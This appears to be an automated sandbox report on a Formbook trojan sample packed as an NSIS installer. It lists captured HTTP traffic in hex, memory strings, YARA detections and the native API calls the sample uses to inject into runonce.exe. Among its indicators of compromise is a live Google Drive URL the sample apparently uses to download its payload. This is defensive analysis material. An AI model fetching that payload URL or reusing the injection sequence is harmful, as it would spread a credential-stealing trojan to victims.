        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 04 Jun 2024 12:40:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheContent-Encoding: gzipData Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 19 3a 18 d5 26 f4 8b f5 89 c1 c6 c4 c0 b1 04 a9 95 e6 16 eb 98 10 ec b0 1e cf d6 a4 4c b1 9a b2 28 8a a9 a0 f9 4c 45 1d db 7a 05 64 9b 03 44 f6 4f 5a 06 7d 19 03 d8 c9 54 08 91 b3 43 ea 13 c6 71 90 1c 42 06 19 23 b6 73 d8 1e 1c 66 86 09 64 99 a5 be 3f d8 38 07 d8 a8 35 bc 85 a5 44 95 2a 64 86 50 05 2b b5 55 a0 f9 c8 23 ef 8d f5 e5 cc a7 cc 58 00 e9 55 6e fa d2 d7 97 af 4d 4f 4f 5d 9e e1 40 e0 6b 55 4e 10 02 7d 96 1f 97 78 1b 0a 37 83 22 5b 14 3d 1f f3 0e 72 f9 9b 01 57 63 e0 09 18 73 65 f6 32 7d 89 47 2e 22 f9 16 d2 15 ee b3 cf e7 be c0 0d 74 1d 2d 7c 32 35 65 5d bf c2 8d 69 b3 ff 11 6d 17 86 70 62 5b d6 72 23 aa 8e e6 80 66 c3 20 a8 72 b1 fd 98 f1 47 4e 05 13 bf 71 67 af 01 ab fb 30 35 f3 4b 02 31 a2 7a 7d 58 
22 71 b5 70 f9 f7 68 eb db de 8b d7 e1 cb 65 fa 66 37 fc f1 fe d1 9b 47 74 ed 5e b8 bf 4e 57 97 c3 f5 3f 4f 0e 1f d2 d7 af 7a 3b 7b e9 7d 8b 3a 3f 47 6b 2b f4 f1 46 af f3 2e ea 76 c2 07 bb e1 bd 3f 4e 0e 97 54 c1 fb 10 5d e6 6a 74 f5 45 ef 76 97 7e f7 94 6e ff 74 72 b8 35 48 c2 ec ae b3 56 46 54 1b c5 1d 84 ab 6b 47 6f 7f 61 7d d0 95 3b b4 f3 37 7d 78 87 ae ed d1 47 2f 8f 37 9f b3 60 f8 e4 80 de 3d 48 5b 54 05 56 91 a8 10 32 8c 21 39 31 e1 ee f2 51 77 bd f7 db 33 ba b2 ff bf 84 cf 6e 85 4f 7f 4d 39 53 c2 93 c3 ed 01 70 d2 13 83 49 e5 86 f7 37 98 62 b6 07 8c be b7 f4 24 da 3f 88 9e bf 3d fe e1 af b8 fa dd 36 5d 5f 39 53 1a 6e 76 8e 6f 6d a5 d5 bd ce 3f b4 b3 73 aa 3a 19 5a 83 4d 1c ae ee 2b 52 85 f4 04 b3 a7 2a a4 86 e8 fb 2b 07 06 3f 36 15 67 90 63 e0 26 c9 9b 4d 57 23 08 bb f9 42 6b 28 01 cc 41 1f 40 df af de 38 67 11 e2 29 82 20 8d 97 f9 d2 05 5e 1a 2f f1 b2 5c 16 1c 3e 1e b8 e7 c6 be aa 0c 55 cd 23 57 c7 f3 bc 8d 35 18 43 f2 96 6f 98 55 86 72 c3 8b 07 f1 15 97 e4 af 42 62 f1 3e 64 69 4e be 70 9e 7d e2 6d c3 6d 10 ab 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 04 Jun 2024 12:40:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheData Raw: 35 66 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 34 34 34 7d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 e5 ae 8b e4 bd 93 22 7d 0a 2e 6d 61 69 6e 7b 77 69 64 74 68 3a 36 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 7d 0a 2e 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 61 35 33 61 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 37 66 39 3b 20 68 65 69 67 68 74 3a 32 38 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 0a 2e 74 31 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 34 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 38 70 78 3b 7d 0a 2e 74 32 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 0a 6f 6c 7b 6d 61 72 67 69 6e 3a 30 20 30 20 32 30 70 78 20 32 32 70 78 3b 70 61 64 64 
69 6e 67 3a 30 3b 7d 0a 6f 6c 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 50 76 53 6f 67 69 57 69 78 42 45 45 68 57 49 22 2c 63 6b 3a 22 4b 50 76 53 6f 67 69 57 69 78 42 45 45 68 57 49 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 31 22 3e e6 82 a8 e7 9a 84 e8 af b7 e6 b1 82 e5 b8 a6 e6 9c 89 e4 b8 8d e5 90 88 e6 b3 95 e5 8
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:41:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: ulACwpUCSU.exe, 00000003.00000003.2865880154.000000000756F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: ulACwpUCSU.exe, 00000003.00000003.2865880154.000000000756F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: ulACwpUCSU.exe, ulACwpUCSU.exe, 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000000.00000000.2283075526.0000000000409000.00000008.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000003.00000000.2705727166.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: ulACwpUCSU.exe, 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000000.00000000.2283075526.0000000000409000.00000008.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000003.00000000.2705727166.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: ulACwpUCSU.exe, 00000003.00000003.2920946844.0000000007558000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download
        Source: ulACwpUCSU.exe, 00000003.00000003.2920593737.0000000007550000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000002.3032516537.0000000007552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download5
        Source: ulACwpUCSU.exe, 00000003.00000003.2920946844.0000000007558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download:
        Source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: runonce.exeString found in binary or memory: https://www.gandi.net/en/domain
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: ulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownHTTPS traffic detected: 142.250.217.174:443 -> 192.168.11.30:49792 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.217.193:443 -> 192.168.11.30:49793 version: TLS 1.2
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_0040515D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040515D

        E-Banking Fraud

        Source: Yara matchFile source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377334E0 NtCreateMutant,LdrInitializeThunk,3_2_377334E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_37732D10
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_37732B90
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37734570 NtSuspendThread,3_2_37734570
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37734260 NtSetContextThread,3_2_37734260
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732F30 NtOpenDirectoryObject,3_2_37732F30
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732F00 NtCreateFile,3_2_37732F00
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732FB0 NtSetValueKey,3_2_37732FB0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732E50 NtCreateSection,3_2_37732E50
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732E00 NtQueueApcThread,3_2_37732E00
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732ED0 NtResumeThread,3_2_37732ED0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732EC0 NtQuerySection,3_2_37732EC0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732EB0 NtProtectVirtualMemory,3_2_37732EB0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732E80 NtCreateProcessEx,3_2_37732E80
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732D50 NtWriteVirtualMemory,3_2_37732D50
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732DC0 NtAdjustPrivilegesToken,3_2_37732DC0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732DA0 NtReadVirtualMemory,3_2_37732DA0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732C50 NtUnmapViewOfSection,3_2_37732C50
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37733C30 NtOpenProcessToken,3_2_37733C30
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732C30 NtMapViewOfSection,3_2_37732C30
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732C20 NtSetInformationFile,3_2_37732C20
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732C10 NtOpenProcess,3_2_37732C10
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732CF0 NtDelayExecution,3_2_37732CF0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C4570 NtSuspendThread,LdrInitializeThunk,5_2_050C4570
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C4260 NtSetContextThread,LdrInitializeThunk,5_2_050C4260
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_050C2D10
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2DA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_050C2DA0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2C30 NtMapViewOfSection,LdrInitializeThunk,5_2_050C2C30
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2C50 NtUnmapViewOfSection,LdrInitializeThunk,5_2_050C2C50
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2CF0 NtDelayExecution,LdrInitializeThunk,5_2_050C2CF0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2F00 NtCreateFile,LdrInitializeThunk,5_2_050C2F00
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2E00 NtQueueApcThread,LdrInitializeThunk,5_2_050C2E00
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2E50 NtCreateSection,LdrInitializeThunk,5_2_050C2E50
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2ED0 NtResumeThread,LdrInitializeThunk,5_2_050C2ED0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C29F0 NtReadFile,LdrInitializeThunk,5_2_050C29F0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2B00 NtQueryValueKey,LdrInitializeThunk,5_2_050C2B00
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_050C2B10
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2B80 NtCreateKey,LdrInitializeThunk,5_2_050C2B80
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_050C2B90
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_050C2BC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2A10 NtWriteFile,LdrInitializeThunk,5_2_050C2A10
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2A80 NtClose,LdrInitializeThunk,5_2_050C2A80
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_050C2AC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C34E0 NtCreateMutant,LdrInitializeThunk,5_2_050C34E0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C38D0 NtGetContextThread,LdrInitializeThunk,5_2_050C38D0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2D50 NtWriteVirtualMemory,5_2_050C2D50
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2DC0 NtAdjustPrivilegesToken,5_2_050C2DC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2C10 NtOpenProcess,5_2_050C2C10
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2C20 NtSetInformationFile,5_2_050C2C20
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2CD0 NtEnumerateKey,5_2_050C2CD0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2F30 NtOpenDirectoryObject,5_2_050C2F30
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2FB0 NtSetValueKey,5_2_050C2FB0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2E80 NtCreateProcessEx,5_2_050C2E80
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2EB0 NtProtectVirtualMemory,5_2_050C2EB0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2EC0 NtQuerySection,5_2_050C2EC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C29D0 NtWaitForSingleObject,5_2_050C29D0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2B20 NtQueryInformationProcess,5_2_050C2B20
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2BE0 NtQueryVirtualMemory,5_2_050C2BE0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2AA0 NtQueryInformationFile,5_2_050C2AA0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C3C30 NtOpenProcessToken,5_2_050C3C30
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C3C90 NtOpenThread,5_2_050C3C90
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03117B60 NtDeleteFile,5_2_03117B60
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03117BF0 NtClose,5_2_03117BF0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03117A80 NtReadFile,5_2_03117A80
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03117920 NtCreateFile,5_2_03117920
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03117D40 NtAllocateVirtualMemory,5_2_03117D40
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403217
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0510EC205_2_0510EC20
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0513EC4C5_2_0513EC4C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514EC605_2_0514EC60
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05146C695_2_05146C69
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050A8CDF5_2_050A8CDF
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0515ACEB5_2_0515ACEB
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0509CF005_2_0509CF00
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514EFBF5_2_0514EFBF
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05096FE05_2_05096FE0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050D2E485_2_050D2E48
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050B0E505_2_050B0E50
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05130E6D5_2_05130E6D
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05140EAD5_2_05140EAD
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05082EE85_2_05082EE8
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0508E9A05_2_0508E9A0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514E9A65_2_0514E9A6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050BE8105_2_050BE810
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051308355_2_05130835
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050768685_2_05076868
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050A68825_2_050A6882
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0512C89F5_2_0512C89F
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050928C05_2_050928C0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05090B105_2_05090B10
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05104BC05_2_05104BC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514CA135_2_0514CA13
